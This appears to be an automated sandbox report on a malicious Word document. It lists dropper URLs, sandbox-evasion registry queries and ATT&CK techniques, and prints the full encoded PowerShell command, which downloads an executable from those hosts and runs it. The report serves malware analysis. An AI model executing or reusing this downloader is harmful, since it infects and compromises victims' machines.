7e8cc3d35422d922681b23e1490a24973b77ed632f1200d2c1eb44bcb89f8cf9

General

Target

7e8cc3d35422d922681b23e1490a24973b77ed632f1200d2c1eb44bcb89f8cf9
Sample

191220-bw1facjzaa
SHA256

7e8cc3d35422d922681b23e1490a24973b77ed632f1200d2c1eb44bcb89f8cf9

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://www.trangiabds.com/wp-admin/88IHJgsuqF/

exe.dropper

https://kashifclothhouse.com/wp-admin/Pzv6563/

exe.dropper

https://hgklighting.com/wp-admin/V5i324/

exe.dropper

https://gloriapionproperties.com/wp-content/9k16/

exe.dropper

https://azatea.com/pytosj2jd/e5X381802/

Signatures

Process spawned unexpected child process 1 IoCs

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4576	5032	Powershell.exe	73

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4576	Powershell.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
4576	Powershell.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
4956	WINWORD.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
4956	WINWORD.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4956	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\7e8cc3d35422d922681b23e1490a24973b77ed632f1200d2c1eb44bcb89f8cf9.doc" /o ""
1⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of FindShellTrayWindow
PID:4956

C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
Powershell -w hidden -en JABLAHAAZQBoAHYAbgB1AGcAYwBpAHEAcAA9ACcASgBzAHYAcQBsAGIAYwB3AGoAYQBlAHoAdgAnADsAJABSAHEAbwB1AGEAYwBlAHAAIAA9ACAAJwA4ADcAOQAnADsAJABQAHUAeABuAG4AegB4AHcAcgB1AD0AJwBBAHAAbQBjAGgAbwBsAGgAJwA7ACQASgBvAGgAeABvAGMAZQBuAGkAZgBoAGMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAFIAcQBvAHUAYQBjAGUAcAArACcALgBlAHgAZQAnADsAJABFAHAAcwBuAGYAZQBkAHcAcwB4AGkAPQAnAFYAcgB2AG0AawB2AHkAegBxAHEAYgB3ACcAOwAkAEoAdwBoAGQAbAB4AG0AZgA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBFAFQALgB3AEUAYgBjAEwAaQBlAG4AVAA7ACQAQQBkAHEAeAB5AHUAegBkAD0AJwBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgB0AHIAYQBuAGcAaQBhAGIAZABzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwA4ADgASQBIAEoAZwBzAHUAcQBGAC8AKgBoAHQAdABwAHMAOgAvAC8AawBhAHMAaABpAGYAYwBsAG8AdABoAGgAbwB1AHMAZQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AUAB6AHYANgA1ADYAMwAvACoAaAB0AHQAcABzADoALwAvAGgAZwBrAGwAaQBnAGgAdABpAG4AZwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AVgA1AGkAMwAyADQALwAqAGgAdAB0AHAAcwA6AC8ALwBnAGwAbwByAGkAYQBwAGkAbwBuAHAAcgBvAHAAZQByAHQAaQBlAHMALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwA5AGsAMQA2AC8AKgBoAHQAdABwAHMAOgAvAC8AYQB6AGEAdABlAGEALgBjAG8AbQAvAHAAeQB0AG8AcwBqADIAagBkAC8AZQA1AFgAMwA4ADEAOAAwADIALwAnAC4AIgBzAFAAbABgAEkAVAAiACgAJwAqACcAKQA7ACQAQgByAGgAbABxAGUAYwBxAGkAdgB6AD0AJwBUAHUAYwBuAHIAawB3AHEAawBtAGIAYQAnADsAZgBvAHIAZQBhAGMAaAAoACQASgB6AGgAYwB2AHEAagByAHkAIABpAG4AIAAkAEEAZABxAHgAeQB1AHoAZAApAHsAdAByAHkAewAkAEoAdwBoAGQAbAB4AG0AZgAuACIARABPAFcAbgBgAGwAbwBBAEQAYABGAEkAbABlACIAKAAkAEoAegBoAGMAdgBxAGoAcgB5ACwAIAAkAEoAbwBoAHgAbwBjAGUAbgBpAGYAaABjACkAOwAkAE8AbgB5AHEAcgBtAHAAYgBmAGwAPQAnAEwAcQBlAGoAYQBtAHIAYwBmAGUAbwBkACcAOwBJAGYAIAAoACgALgAoACcARwBlAHQALQAnACsAJwBJAHQAJwArACcAZQBtACcAKQAgACQASgBvAGgAeABvAGMAZQBuAGkAZgBoAGMAKQAuACIATABFAE4AYABHAHQASAAiACAALQBnAGUAIAAyADcAMwAyADgAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAEEAYABSAHQAIgAoACQASgBvAGgAeABvAGMAZQBuAGkAZgBoAGMAKQA7ACQAWABxAGYAZgBsAGUAdgBvAGQAawBlAGkAaAA9ACcAUAByAGIAegB5AGcAbABiAG0AcABqAGoAJwA7AGIAcgBlAGEAawA7ACQAWgB1AGgAZgBwAHIAawB6AGYAYQA9ACcAQwBiAHoAdgBkAGoAeQBvAG8AeABjACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFEAbQBwAHQAcQBiAHUAcwBlAGUAPQAnAEQAcwBsAGcAcABsAGEAbQBqAGQAagBjAHEAJwA=
1⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:4576

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads